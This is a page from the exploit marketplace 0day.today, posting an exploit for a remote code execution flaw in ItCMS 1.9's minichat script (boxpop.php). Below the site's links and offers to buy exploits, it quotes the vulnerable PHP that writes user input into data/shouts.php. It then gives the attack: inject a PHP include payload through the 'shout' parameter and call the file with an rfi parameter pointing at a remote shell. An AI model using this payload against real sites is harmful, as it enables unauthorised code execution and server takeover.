0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability
========================================================== ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability ========================================================== #===========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #===========================================================================================================================# # ItCMS 1.9 Remote File Rewriting # #===========================================================================================================================# # Author : Cod3rZ # #===========================================================================================================================# # Remote File Rewriting: # #===========================================================================================================================# # /box/minichat/boxpop.php # #===========================================================================================================================# # if ($_POST["shout"]!=""){ # # $shout = $_POST['shout']; # # } else if ($_GET["shout"]!=""){ # # $shout = $_GET["shout"]; # # } # # [...] # # $shout = trim($shout); # # $shout = stripslashes($shout); # # $shout = str_replace ("\r\n", " [br] ", $shout); # # $shout = first($shout); # # [...] # # $FileName="data/shouts.php"; # # if($FilePointer=fopen($FileName, "a+")){ # # fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n"); # # fclose($FilePointer); # #===========================================================================================================================# # So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout, # # and then we go in data/shouts.php?rfi=[shell] # #===========================================================================================================================# # There are many other bugs, find it yourself # #===========================================================================================================================# # 0day.today [2024-11-16] #